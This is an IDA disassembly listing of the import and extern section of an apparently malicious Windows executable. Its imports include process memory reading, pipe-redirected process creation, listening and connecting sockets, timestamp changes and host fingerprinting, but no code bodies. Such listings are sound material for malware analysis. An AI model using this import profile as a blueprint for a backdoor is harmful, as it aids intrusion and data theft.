; BOOL __stdcall InitializeCriticalSectionAndSpinCount(LPCRITICAL_SECTION lpCriticalSection, DWORD dwSpinCount)
extrn InitializeCriticalSectionAndSpinCount:dword
; CODE XREF: sub_4082D7+77�p
; DATA XREF: sub_4082D7+77�r
; void __stdcall DeleteCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn DeleteCriticalSection:dword ; CODE XREF: sub_4082D7+6B�p
; sub_4082D7+241�p
; DATA XREF: ...
extrn byte_4240CC:byte:4 ; CODE XREF: sub_409990+170�p
; DATA XREF: sub_409990+170�r
;
; Imports from kernel32.dll
;
; DWORD __stdcall GetEnvironmentVariableW(LPCWSTR lpName, LPWSTR lpBuffer, DWORD nSize)
extrn GetEnvironmentVariableW:dword ; CODE XREF: sub_409990+D3�p
; sub_409990+E1�p
; DATA XREF: ...
extrn byte_4240D4:byte:8 ; CODE XREF: sub_409990+71�p
; sub_409990+7E�p ...
;
; Imports from kernel32.dll
;
; BOOL __stdcall HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
extrn HeapFree:dword ; CODE XREF: sub_409B62+41�p
; sub_409B62+F5�p ...
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: sub_409B62+28�p
; sub_409B62+50�p ...
; HANDLE __stdcall GetProcessHeap()
extrn GetProcessHeap:dword ; CODE XREF: sub_409B62+1F�p
; sub_409B62+3E�p ...
; SIZE_T __stdcall VirtualQueryEx(HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength)
extrn VirtualQueryEx:dword ; CODE XREF: sub_409CEB+88�p
; sub_409E8F+53�p
; DATA XREF: ...
; BOOL __stdcall ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead)
extrn ReadProcessMemory:dword ; CODE XREF: sub_409CEB+6C�p
; sub_409CEB+D2�p ...
; void __stdcall GetSystemInfo(LPSYSTEM_INFO lpSystemInfo)
extrn GetSystemInfo:dword ; CODE XREF: sub_409CEB+34�p
; sub_409E8F+2C�p
; DATA XREF: ...
; HANDLE __stdcall OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId)
extrn OpenProcess:dword ; CODE XREF: sub_409CEB+15�p
; sub_409E8F+10�p ...
extrn byte_4240F8:byte:4 ; CODE XREF: sub_40A16C+F�p
; sub_40A16C+264�p ...
;
; Imports from kernel32.dll
;
; DWORD __stdcall FormatMessageA(DWORD dwFlags, LPCVOID lpSource, DWORD dwMessageId, DWORD dwLanguageId, LPSTR lpBuffer, DWORD nSize, va_list *Arguments)
extrn FormatMessageA:dword ; CODE XREF: sub_40B377+2D�p
; DATA XREF: sub_40B377+2D�r
; BOOL __stdcall GlobalUnlock(HGLOBAL hMem)
extrn GlobalUnlock:dword ; CODE XREF: sub_40B401+26�p
; DATA XREF: sub_40B401+26�r
; LPVOID __stdcall GlobalLock(HGLOBAL hMem)
extrn GlobalLock:dword ; CODE XREF: sub_40B401+1D�p
; DATA XREF: sub_40B401+1D�r
extrn byte_424108:byte:0Ch ; CODE XREF: sub_40B43C+69�p
; sub_40B43C+36�p ...
;
; Imports from kernel32.dll
;
; BOOL __stdcall SetFileTime(HANDLE hFile, const FILETIME *lpCreationTime, const FILETIME *lpLastAccessTime, const FILETIME *lpLastWriteTime)
extrn SetFileTime:dword ; CODE XREF: sub_40B4BE+96�p
; sub_40BAB1+300�p
; DATA XREF: ...
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
extrn CreateProcessA:dword ; CODE XREF: sub_40B584+17E�p
; sub_40B70C+B4�p ...
; DWORD __stdcall ExpandEnvironmentStringsA(LPCSTR lpSrc, LPSTR lpDst, DWORD nSize)
extrn ExpandEnvironmentStringsA:dword ; CODE XREF: sub_40B584+15D�p
; DATA XREF: sub_40B584+15D�r
; BOOL __stdcall SetFileAttributesA(LPCSTR lpFileName, DWORD dwFileAttributes)
extrn SetFileAttributesA:dword ; CODE XREF: sub_40B584+126�p
; sub_40BAB1+B4�p ...
; DWORD __stdcall GetTempPathA(DWORD nBufferLength, LPSTR lpBuffer)
extrn GetTempPathA:dword ; CODE XREF: sub_40B584+35�p
; sub_40FCA3+3F47�p
; DATA XREF: ...
; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation)
extrn GetVersionExA:dword ; CODE XREF: sub_40BA1B+1A�p
; sub_40C271+1D�p ...
; BOOL __stdcall CopyFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName, BOOL bFailIfExists)
extrn CopyFileA:dword ; CODE XREF: sub_40F1EA+209�p
; DATA XREF: sub_40F1EA:loc_40F3B2�r
; BOOL __stdcall GetExitCodeProcess(HANDLE hProcess, LPDWORD lpExitCode)
extrn GetExitCodeProcess:dword ; CODE XREF: sub_40BF14+5A�p
; DATA XREF: sub_40BF14+5A�r
; BOOL __stdcall PeekNamedPipe(HANDLE hNamedPipe, LPVOID lpBuffer, DWORD nBufferSize, LPDWORD lpBytesRead, LPDWORD lpTotalBytesAvail, LPDWORD lpBytesLeftThisMessage)
extrn PeekNamedPipe:dword ; CODE XREF: sub_40BF14+3D�p
; DATA XREF: sub_40BF14+3D�r
; BOOL __stdcall DuplicateHandle(HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwOptions)
extrn DuplicateHandle:dword ; CODE XREF: sub_40C069+91�p
; DATA XREF: sub_40C069+91�r
; HANDLE __stdcall GetCurrentProcess()
extrn GetCurrentProcess:dword ; CODE XREF: sub_40C069+88�p
; sub_40C069+8E�p ...
; BOOL __stdcall CreatePipe(PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize)
extrn CreatePipe:dword ; CODE XREF: sub_40C069+58�p
; sub_40C069+6F�p
; DATA XREF: ...
; void __stdcall GlobalMemoryStatus(LPMEMORYSTATUS lpBuffer)
extrn GlobalMemoryStatus:dword ; CODE XREF: sub_40C3BE+1CF�p
; DATA XREF: sub_40C3BE+1CF�r
; UINT __stdcall GetSystemDirectoryA(LPSTR lpBuffer, UINT uSize)
extrn GetSystemDirectoryA:dword ; CODE XREF: sub_40C3BE+183�p
; sub_40D432+3A�p ...
; void __stdcall GetLocalTime(LPSYSTEMTIME lpSystemTime)
extrn GetLocalTime:dword ; CODE XREF: sub_40CB08+D�p
; sub_419597+D�p
; DATA XREF: ...
extrn byte_424150:byte:4 ; CODE XREF: sub_40D66D+465�p
; sub_40DF02+DF�p ...
;
; Imports from kernel32.dll
;
; int __stdcall WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte:dword ; CODE XREF: sub_40E717+27�p
; sub_40E717+5B�p ...
; BOOL __stdcall GetComputerNameA(LPSTR lpBuffer, LPDWORD nSize)
extrn GetComputerNameA:dword ; CODE XREF: sub_40F12C+34�p
; DATA XREF: sub_40F12C+34�r
; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
extrn DeleteFileA:dword ; CODE XREF: sub_40F1EA+345�p
; sub_40FCA3+4D81�p ...
; DWORD __stdcall GetCurrentProcessId()
extrn GetCurrentProcessId:dword ; CODE XREF: sub_40F1EA+26B�p
; DATA XREF: sub_40F1EA+26B�r
; DWORD __stdcall WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds)
extrn WaitForSingleObject:dword ; CODE XREF: sub_40F1EA+78�p
; sub_40F1EA+319�p
; DATA XREF: ...
; HANDLE __stdcall CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes, BOOL bInitialOwner, LPCSTR lpName)
extrn CreateMutexA:dword ; CODE XREF: sub_40F1EA+71�p
; DATA XREF: sub_40F1EA+71�r
; BOOL __stdcall TerminateThread(HANDLE hThread, DWORD dwExitCode)
extrn TerminateThread:dword ; CODE XREF: sub_40FCA3+4FF2�p
; sub_41755A+27�p
; DATA XREF: ...
; BOOL __stdcall MoveFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName)
extrn MoveFileA:dword ; CODE XREF: sub_40FCA3+3D2F�p
; DATA XREF: sub_40FCA3+3D2F�r
; BOOL __stdcall TerminateProcess(HANDLE hProcess, UINT uExitCode)
extrn TerminateProcess:dword ; CODE XREF: sub_41615A+109�p
; sub_41615A+212�p ...
extrn lstrcmpi:dword ; CODE XREF: sub_41615A+D3�p
; DATA XREF: sub_41615A+D3�r
; int __stdcall GetLocaleInfoA(LCID Locale, LCTYPE LCType, LPSTR lpLCData, int cchData)
extrn GetLocaleInfoA:dword ; CODE XREF: .text:004167A1�p
; DATA XREF: .text:004167A1�r
; DWORD __stdcall GetLogicalDrives()
extrn GetLogicalDrives:dword ; CODE XREF: sub_416E4D+1F0�p
; DATA XREF: sub_416E4D+1F0�r
extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwind�r
; DWORD __stdcall GetTimeZoneInformation(LPTIME_ZONE_INFORMATION lpTimeZoneInformation)
extrn GetTimeZoneInformation:dword ; CODE XREF: sub_419597+6C�p
; sub_4210F5+38�p
; DATA XREF: ...
; void __stdcall GetSystemTime(LPSYSTEMTIME lpSystemTime)
extrn GetSystemTime:dword ; CODE XREF: sub_419597+17�p
; DATA XREF: sub_419597+17�r
; LPVOID __stdcall HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes)
extrn HeapReAlloc:dword ; CODE XREF: sub_419C9F+110�p
; sub_419C9F+22D�p ...
; void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo)
extrn GetStartupInfoA:dword ; CODE XREF: .text:0041A405�p
; sub_41E920+59�p
; DATA XREF: ...
; LPSTR __stdcall GetCommandLineA()
extrn GetCommandLineA:dword ; CODE XREF: .text:0041A3DA�p
; DATA XREF: .text:0041A3DA�r
; DWORD __stdcall GetVersion()
extrn GetVersion:dword ; CODE XREF: .text:0041A38C�p
; DATA XREF: .text:0041A38C�r
; DWORD __stdcall GetEnvironmentVariableA(LPCSTR lpName, LPSTR lpBuffer, DWORD nSize)
extrn GetEnvironmentVariableA:dword ; CODE XREF: sub_41AE81+54�p
; DATA XREF: sub_41AE81+54�r
; BOOL __stdcall HeapDestroy(HANDLE hHeap)
extrn HeapDestroy:dword ; CODE XREF: sub_41AFC9+50�p
; DATA XREF: sub_41AFC9+50�r
; HANDLE __stdcall HeapCreate(DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize)
extrn HeapCreate:dword ; CODE XREF: sub_41AFC9+11�p
; DATA XREF: sub_41AFC9+11�r
; BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType)
extrn VirtualFree:dword ; CODE XREF: sub_41B099+258�p
; sub_41B099+2B3�p ...
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
extrn VirtualAlloc:dword ; CODE XREF: sub_41B6CB+76�p
; sub_41B77C+51�p ...
; BOOL __stdcall IsBadWritePtr(LPVOID lp, UINT_PTR ucb)
extrn IsBadWritePtr:dword ; CODE XREF: sub_420A3F+C�p
; DATA XREF: sub_420A3F+C�r
; void __stdcall RaiseException(DWORD dwExceptionCode, DWORD dwExceptionFlags, DWORD nNumberOfArguments, const ULONG_PTR *lpArguments)
extrn RaiseException:dword ; CODE XREF: sub_41C325+215�p
; sub_423316+2E�p
; DATA XREF: ...
; SIZE_T __stdcall HeapSize(HANDLE hHeap, DWORD dwFlags, LPCVOID lpMem)
extrn HeapSize:dword ; CODE XREF: sub_41D888+58�p
; DATA XREF: sub_41D888+58�r
; LPVOID __stdcall LockResource(HGLOBAL hResData)
extrn LockResource:dword ; CODE XREF: sub_41E920+19D�p
; DATA XREF: sub_41E920+19D�r
; HANDLE __stdcall GetStdHandle(DWORD nStdHandle)
extrn GetStdHandle:dword ; CODE XREF: sub_41E920+158�p
; sub_41FEA9+143�p
; DATA XREF: ...
;
; Imports from version.dll
;
; DWORD __stdcall GetFileVersionInfoSizeA(LPCSTR lptstrFilename, LPDWORD lpdwHandle)
extrn __imp_GetFileVersionInfoSizeA:dword
; DATA XREF: GetFileVersionInfoSizeA�r
; BOOL __stdcall GetFileVersionInfoA(LPCSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData)
extrn __imp_GetFileVersionInfoA:dword ; DATA XREF: GetFileVersionInfoA�r
; BOOL __stdcall VerQueryValueA(LPCVOID pBlock, LPCSTR lpSubBlock, LPVOID *lplpBuffer, PUINT puLen)
extrn __imp_VerQueryValueA:dword ; DATA XREF: VerQueryValueA�r
;
; Imports from ws2_32.dll
;
; int __stdcall WSACleanup()
extrn WSACleanup:dword ; CODE XREF: sub_4062E4+6E�p
; sub_406361+BA�p
; DATA XREF: ...
; int __stdcall WSAStartup(WORD wVersionRequested, LPWSADATA lpWSAData)
extrn WSAStartup:dword ; CODE XREF: sub_405D1B+47�p
; sub_4062E4+15�p
; DATA XREF: ...
; int __stdcall setsockopt(SOCKET s, int level, int optname, const char *optval, int optlen)
extrn setsockopt:dword ; CODE XREF: sub_405D1B+75�p
; DATA XREF: sub_405D1B+75�r
; int __stdcall bind(SOCKET s, const struct sockaddr *name, int namelen)
extrn bind:dword ; CODE XREF: sub_405D1B+AC�p
; DATA XREF: sub_405D1B+AC�r
; int __stdcall listen(SOCKET s, int backlog)
extrn listen:dword ; CODE XREF: sub_405D1B+C0�p
; DATA XREF: sub_405D1B+C0�r
; SOCKET __stdcall accept(SOCKET s, struct sockaddr *addr, int *addrlen)
extrn accept:dword ; CODE XREF: sub_405D1B+166�p
; DATA XREF: sub_405D1B+166�r
; unsigned __int32 __stdcall inet_addr(const char *cp)
extrn inet_addr:dword ; CODE XREF: sub_40564B+27�p
; sub_4062E4+35�p
; DATA XREF: ...
; u_short __stdcall htons(u_short hostshort)
extrn htons:dword ; CODE XREF: sub_40564B+36�p
; sub_405D1B+9B�p ...
; int __stdcall recv(SOCKET s, char *buf, int len, int flags)
extrn recv:dword ; CODE XREF: sub_40564B+79�p
; sub_40564B+DD�p ...
; int __stdcall send(SOCKET s, const char *buf, int len, int flags)
extrn send:dword ; CODE XREF: sub_404B02+12�p
; sub_40564B+C3�p ...
; int __stdcall select(int nfds, fd_set *readfds, fd_set *writefds, fd_set *exceptfds, const struct timeval *timeout)
extrn select:dword ; CODE XREF: sub_40495F+4C�p
; sub_405D1B+FD�p
; DATA XREF: ...
; int __stdcall __WSAFDIsSet(SOCKET fd, fd_set *)
extrn __imp___WSAFDIsSet:dword ; DATA XREF: __WSAFDIsSet�r
; u_short __stdcall htons_0(u_short hostshort)
extrn htons_0:dword ; CODE XREF: sub_40321F+1D7�p
; sub_40321F+1E9�p
; DATA XREF: ...
; char *__stdcall inet_ntoa(struct in_addr in)
extrn inet_ntoa:dword ; CODE XREF: sub_40321F+21F�p
; sub_40321F+243�p
; DATA XREF: ...
; SOCKET __stdcall socket(int af, int type, int protocol)
extrn socket:dword ; CODE XREF: sub_401C6E+52�p
; .text:00404EA7�p ...
; int __stdcall ioctlsocket(SOCKET s, __int32 cmd, u_long *argp)
extrn ioctlsocket:dword ; CODE XREF: sub_401C6E+6E�p
; sub_405D1B+85�p
; DATA XREF: ...
; int __stdcall connect(SOCKET s, const struct sockaddr *name, int namelen)
extrn connect:dword ; CODE XREF: sub_401C6E+88�p
; sub_40564B+59�p ...
; int __stdcall closesocket(SOCKET s)
extrn closesocket:dword ; CODE XREF: sub_401C6E+A4�p
; sub_40564B+E0�p ...
extrn unk_424268 ; DATA XREF: sub_404B54+2F�r
extrn unk_424270 ; DATA XREF: sub_404B54+15�r
extrn unk_424278 ; DATA XREF: sub_404BA0+7A�r
extrn unk_424280 ; DATA XREF: .text:00422E65�o
extrn unk_424288 ; DATA XREF: sub_40CDA0+24�r
extrn unk_424688 ; DATA XREF: sub_40D66D+2B8�r
; sub_40D66D+2CD�r ...
extrn unk_424690 ; DATA XREF: sub_4164B5+2B�r
extrn dbl_424698:qword ; DATA XREF: sub_418290+6C�r
; sub_4183D7+6C�r ...
; const CHAR byte_424738
extrn byte_424738:byte ; DATA XREF: sub_41AE81+4F�o
extrn dbl_424800:qword ; DATA XREF: sub_41C5D8+8C�r
; sub_41C5D8+AC�r ...
extrn dbl_424808:qword ; DATA XREF: sub_41CAED+F�r
extrn dbl_424810:qword ; DATA XREF: sub_41CAED+6�r
extrn aIsprocessorfea:byte:1Ah ; DATA XREF: sub_41CB2B+F�o
extrn aKernel32:byte:9 ; DATA XREF: sub_41CB2B�o
; const WCHAR SrcStr
extrn SrcStr:word ; DATA XREF: sub_41EE0F+36�o
; sub_420187+39�o ...
; const CHAR String2
extrn String2:byte ; DATA XREF: sub_4210F5+A�o
extrn unk_424CB8 ; DATA XREF: sub_422DFA+3B�r
; sub_422EE1+34�r
extrn aUnknownExcepti:byte:12h ; DATA XREF: .text:004232DF�o
extrn off_424D08:dword ; DATA XREF: sub_4232E5�o
extrn unk_424EF0 ; DATA XREF: .text:loc_423837�o
extrn unk_424F1C ; DATA XREF: .text:loc_423854�o
extrn unk_424F6C ; DATA XREF: .text:loc_423860�o
extrn unk_425008 ; DATA XREF: .text:loc_423874�o
extrn unk_425030 ; DATA XREF: .text:loc_423888�o
extrn unk_425078 ; DATA XREF: .text:loc_42389C�o
extrn unk_4250A0 ; DATA XREF: .text:loc_4238B0�o
extrn unk_4250C8 ; DATA XREF: .text:loc_4238C4�o
extrn unk_425130 ; DATA XREF: .text:loc_4238D8�o
extrn unk_425158 ; DATA XREF: .text:loc_4238EC�o
extrn unk_42744C ; DATA XREF: .text:0041650B�o
extrn unk_427510 ; DATA XREF: sub_402BB1+29E�r
extrn unk_427534 ; DATA XREF: sub_402BB1+297�r
; char unk_428C78
extrn unk_428C78 ; DATA XREF: sub_403DDC+2AC�o
; char unk_428CE8
extrn unk_428CE8 ; DATA XREF: sub_403DDC+2D3�o
extrn unk_429050 ; DATA XREF: sub_403DDC+247�r
extrn unk_429190 ; DATA XREF: sub_403DDC+D�r
extrn unk_429194 ; DATA XREF: sub_403DDC+16�r
; char unk_429280
extrn unk_429280 ; DATA XREF: sub_404B02+A�o
extrn unk_42A9C8 ; DATA XREF: sub_4057F1+24�r
; .text:00405945�r
extrn unk_42A9CC ; DATA XREF: sub_4057F1+10�r
extrn unk_42A9E8 ; DATA XREF: .text:00405984�r
; char unk_42AA08
extrn unk_42AA08 ; DATA XREF: sub_405D1B+593�o
; char unk_42AABC
extrn unk_42AABC ; DATA XREF: sub_405D1B+50E�o
; char unk_42AAD4
extrn unk_42AAD4 ; DATA XREF: sub_405D1B+4E2�o
; char unk_42AC98
extrn unk_42AC98 ; DATA XREF: sub_405D1B+1B0�o
; const CHAR unk_42AEDC
extrn unk_42AEDC ; DATA XREF: StartAddress+97�o
; sub_40C3BE+1AE�o
; const CHAR unk_42AEE8
extrn unk_42AEE8 ; DATA XREF: StartAddress+83�o
; char unk_42B478
extrn unk_42B478 ; DATA XREF: sub_407516+48D�o
; char unk_42B510
extrn unk_42B510 ; DATA XREF: sub_407516+399�o
extrn unk_42B620 ; DATA XREF: sub_407A07+1E�r
; sub_40FCA3+317F�r ...
; const CHAR pwszDriver
extrn pwszDriver:byte ; DATA XREF: sub_408F04+11�o
extrn unk_42C164 ; DATA XREF: sub_409577+C�r
; const WCHAR word_42D568
extrn word_42D568:word ; DATA XREF: sub_409990+DC�o
; const WCHAR Name
extrn Name:word ; DATA XREF: sub_409990+CE�o
; const CHAR byte_42D630
extrn byte_42D630:byte ; DATA XREF: sub_409990+40�o
; sub_409990+161�o ...
; const CHAR ClassName
extrn ClassName:byte ; DATA XREF: sub_40B43C+5�o
; sub_4167FE+18�o
; const CHAR byte_42E218
extrn byte_42E218:byte ; DATA XREF: sub_40B562+2�o
; const CHAR Format
extrn Format:byte ; DATA XREF: sub_40C3BE+192�o
extrn unk_42FD6C ; DATA XREF: sub_40C3BE:loc_40C4C0�r
; const CHAR SubBlock
extrn SubBlock:byte ; DATA XREF: sub_40C738+44�o
; DWORD dwMilliseconds
extrn dwMilliseconds:dword ; DATA XREF: sub_40CD88+A�r
; const CHAR Operation
extrn Operation:byte ; DATA XREF: sub_40D66D+32B�o
; sub_40FCA3+2C0D�o ...
; char buf
extrn buf:byte ; DATA XREF: sub_40E022+A4�o
; char byte_4306F4
extrn byte_4306F4:byte ; DATA XREF: sub_40E022+E3�o
extrn unk_430758 ; DATA XREF: sub_40E271+6D�r
; sub_40E658+50�r ...
extrn unk_43075C ; DATA XREF: sub_40E658+82�r
; sub_40E96E+66�r
extrn unk_431598 ; DATA XREF: sub_40F1EA+5A6�r
; sub_40F1EA+659�r
extrn unk_43159C ; DATA XREF: sub_40F1EA+6A5�r
extrn unk_4315A0 ; DATA XREF: sub_40FCA3:loc_415BBC�r
extrn unk_4315A4 ; DATA XREF: sub_407B48+40�r
; sub_40FCA3+557E�r
extrn unk_4315A8 ; DATA XREF: sub_407B48:loc_407E46�r
; sub_40FCA3:loc_415319�r
extrn unk_4315B0 ; DATA XREF: sub_40FCA3+626�r
extrn unk_4315B4 ; DATA XREF: sub_40B584+C�r
; sub_40F1EA+367�r
extrn unk_4315B8 ; DATA XREF: sub_40DB4C:loc_40DB58�r
; sub_40FCA3+A9F�r ...
extrn dword_4315BC:dword ; DATA XREF: .text:0041651D�r
; .text:00416543�r ...
extrn unk_4315C0 ; DATA XREF: sub_40F8D6+C6�r
; sub_40FCA3+26E�r ...
extrn unk_4315C4 ; DATA XREF: sub_40F8D6+C0�r
; sub_40FCA3+268�r
extrn unk_4315C8 ; DATA XREF: sub_40F1EA:loc_40F56E�r
extrn unk_4315CC ; DATA XREF: sub_40BAB1+361�w
; sub_40F8D6+101�r
extrn unk_4315DA ; DATA XREF: sub_40FCA3:loc_414E0F�r
extrn unk_4315F4 ; DATA XREF: sub_40F1EA+2C�r
; const CHAR byte_4315F8
extrn byte_4315F8:byte ; DATA XREF: sub_40F1EA+6A�o
; const CHAR ValueName
extrn ValueName:byte ; DATA XREF: sub_40CD17+B�o
extrn unk_4316CC ; DATA XREF: sub_40FCA3+880�r
; const CHAR byte_431738
extrn byte_431738:byte ; DATA XREF: sub_416B27+28�o
; sub_416E4D+28�o
; const CHAR byte_431750
extrn byte_431750:byte ; DATA XREF: sub_416B27+D4�o
; sub_416E4D+D4�o
extrn unk_4317D0 ; DATA XREF: .text:loc_40543F�r
; .text:004055A6�r
extrn unk_4333B8 ; DATA XREF: sub_40CA10+72�w
; sub_40FCA3+B09�r ...
; const CHAR SubKey
extrn SubKey:byte ; DATA XREF: sub_40F1EA+3BF�o
; const CHAR File
extrn File:byte ; DATA XREF: sub_40FCA3+2C08�o
; DWORD dword_43A9B8
extrn dword_43A9B8:dword ; DATA XREF: sub_416495+12�r
extrn unk_43D538 ; CODE XREF: sub_41689B+4D�p
; DATA XREF: sub_41689B+4D�r
extrn unk_43D564 ; DATA XREF: .text:00416532�o
; DWORD dword_43D630
extrn dword_43D630:dword ; DATA XREF: sub_417169+10�r
; const CHAR byte_43D8F4
extrn byte_43D8F4:byte ; DATA XREF: sub_416B27+ED�o
; sub_416E4D+ED�o
; const CHAR byte_43D9A8
extrn byte_43D9A8:byte ; DATA XREF: sub_416B27+54�o
; sub_416E4D+54�o
extrn unk_43D9B4 ; DATA XREF: sub_416B27+38�r
extrn unk_43DBA4 ; DATA XREF: sub_416E4D+38�r
extrn unk_43DBB6 ; DATA XREF: sub_41731E+C6�w
extrn unk_43DBBB ; DATA XREF: sub_41731E+CD�w
extrn unk_43DBCD ; DATA XREF: sub_41731E+A4�w
extrn unk_43DBD1 ; DATA XREF: sub_41731E+AA�w
extrn unk_43DC3C ; DATA XREF: sub_4171A7+3D�w
extrn unk_43DC55 ; DATA XREF: sub_4171A7+4D�w
extrn unk_43DC5D ; DATA XREF: sub_4171A7+45�w
extrn unk_43DC6B ; DATA XREF: sub_4171A7+5D�w
extrn unk_43DCEC ; DATA XREF: sub_4179AD+4�w sub_4179B7�r ...
extrn unk_43DCF0 ; DATA XREF: sub_418290+D�r
extrn unk_43DCFC ; CODE XREF: sub_41A208+9�p
; DATA XREF: sub_41A208�r
extrn unk_43DD08 ; DATA XREF: sub_4183D7+D�r
extrn unk_43DD20 ; CODE XREF: sub_41A45C+1C�p
; DATA XREF: sub_41A45C+1C�r
extrn unk_43DD24 ; DATA XREF: sub_41FE70+E�r
; sub_41FEA9+46�r ...
extrn unk_43DD28 ; DATA XREF: sub_41A5BA:loc_41A91E�r
; sub_41A5BA+457�r
extrn unk_43DD2C ; DATA XREF: sub_41A5BA+259�r
extrn dword_43DD30:dword ; DATA XREF: sub_417E44+23�r
; sub_417E44:loc_417EA5�r ...
extrn unk_43DD34 ; DATA XREF: sub_4235FE+18�r
extrn unk_43DD3A ; DATA XREF: sub_421650+18�r
; int cbMultiByte
extrn cbMultiByte:dword ; DATA XREF: sub_417E44:loc_417E4C�r
; sub_417E44:loc_417E90�r ...
extrn byte_43DF40:byte ; DATA XREF: sub_41CB54:loc_41CB94�r
; .text:0041CBB2�r ...
extrn off_43DF50:dword ; DATA XREF: sub_41BB6D+D�o
; sub_41BB6D+72�r ...
; LPVOID lpMem
extrn lpMem:dword ; DATA XREF: sub_41BB6D:loc_41BBED�r
; sub_41BB6D+89�w ...
extrn unk_43DF60 ; DATA XREF: sub_41BB6D�r
; sub_41BCB1:loc_41BCFE�w
extrn unk_43FF70 ; DATA XREF: sub_41BCB1+15�r
; sub_41BCB1+20�w ...
extrn dword_43FF74:dword ; DATA XREF: sub_4181B3:loc_4181EF�r
; sub_419C9F+185�r ...
extrn unk_43FF7C ; DATA XREF: sub_41C89D:loc_41C8BA�r
extrn unk_440050 ; DATA XREF: sub_41C5D8+B7�r
; sub_41C5D8:loc_41C6BF�r ...
extrn unk_440060 ; DATA XREF: sub_41C5D8+92�r
; sub_41C5D8:loc_41C697�r ...
extrn unk_440078 ; DATA XREF: sub_41CA85+D�r
; sub_41CA85+1F�r
extrn unk_440084 ; DATA XREF: sub_41CA85+31�r
extrn dword_440090:dword ; CODE XREF: sub_41A5BA+3AA�p
; DATA XREF: sub_418377+F�w ...
extrn dword_440094:dword ; CODE XREF: sub_41A5BA+3E2�p
; DATA XREF: sub_418377+5�w ...
extrn dword_440098:dword ; CODE XREF: sub_41D9B5+430�p
; DATA XREF: sub_418377+14�w ...
extrn dword_44009C:dword ; CODE XREF: sub_41A5BA+3CB�p
; DATA XREF: sub_418377+1E�w ...
extrn dword_4400A0:dword ; DATA XREF: sub_418377+28�w
extrn dword_4400A4:dword ; DATA XREF: sub_418377+32�w
extrn unk_4400B4 ; CODE XREF: sub_41D832+39�p
; DATA XREF: sub_41D832+29�r
extrn unk_4401CC ; DATA XREF: sub_41F64A:loc_41F67F�r
extrn unk_440330 ; DATA XREF: sub_41F8BC+A�r
extrn unk_440334 ; DATA XREF: sub_422245+A�r
extrn unk_4403A8 ; DATA XREF: sub_41F77B+58�r
; sub_422118+C8�r
extrn unk_4403AC ; DATA XREF: sub_41F77B+5E�r
; sub_422118+CD�r
extrn unk_4403B0 ; DATA XREF: sub_41F8BC+4�r
; sub_422245+4�r
extrn unk_4403B4 ; DATA XREF: sub_41F77B+82�r
; sub_41F77B+8F�w ...
extrn off_440448:dword ; DATA XREF: .text:004200BB�o
extrn unk_440458 ; DATA XREF: .text:004200D8�o
extrn unk_4404B8 ; DATA XREF: .text:00420101�o
extrn unk_4406C8 ; DATA XREF: sub_41C23A+3�r
; sub_41C28D+46�r ...
extrn unk_440700 ; DATA XREF: sub_41ED4D+76�r
; sub_4210F5+5E�w ...
extrn unk_440704 ; DATA XREF: sub_41ED4D+98�r
; sub_4210F5+8B�w ...
extrn unk_440708 ; DATA XREF: sub_41ED4D:loc_41EDFF�r
; sub_4210F5+94�w ...
; LPSTR lpMultiByteStr
extrn lpMultiByteStr:dword ; DATA XREF: sub_4210F5+BA�r
; sub_4210F5+D9�r ...
; LPSTR off_440790
extrn off_440790:dword ; DATA XREF: sub_4210F5+F4�r
; sub_4210F5+11B�r ...
extrn unk_440798 ; DATA XREF: sub_4210F5+1D�w
; sub_421353+1E�r ...
extrn unk_44079C ; DATA XREF: sub_421353:loc_421487�r
; sub_4214FF+BF�w
extrn unk_4407A0 ; DATA XREF: sub_421353+192�r
; sub_4214FF+E0�w
extrn unk_4407A8 ; DATA XREF: sub_4210F5+17�w
; sub_421353+26�r ...
extrn unk_4407AC ; DATA XREF: sub_421353+13A�r
; sub_4214FF+EA�w ...
extrn unk_4407B0 ; DATA XREF: sub_421353+1A1�r
; sub_4214FF+A3�r ...
extrn unk_4407E4 ; DATA XREF: sub_41ED4D+2A�r
; sub_4214FF:loc_4215AB�r
; char unk_440B78
extrn unk_440B78 ; DATA XREF: sub_401444+1C1�w
; sub_401444+2C0�o
extrn unk_440B7A ; DATA XREF: sub_401444+1D1�w
extrn unk_440B7C ; DATA XREF: sub_401444+1D7�w
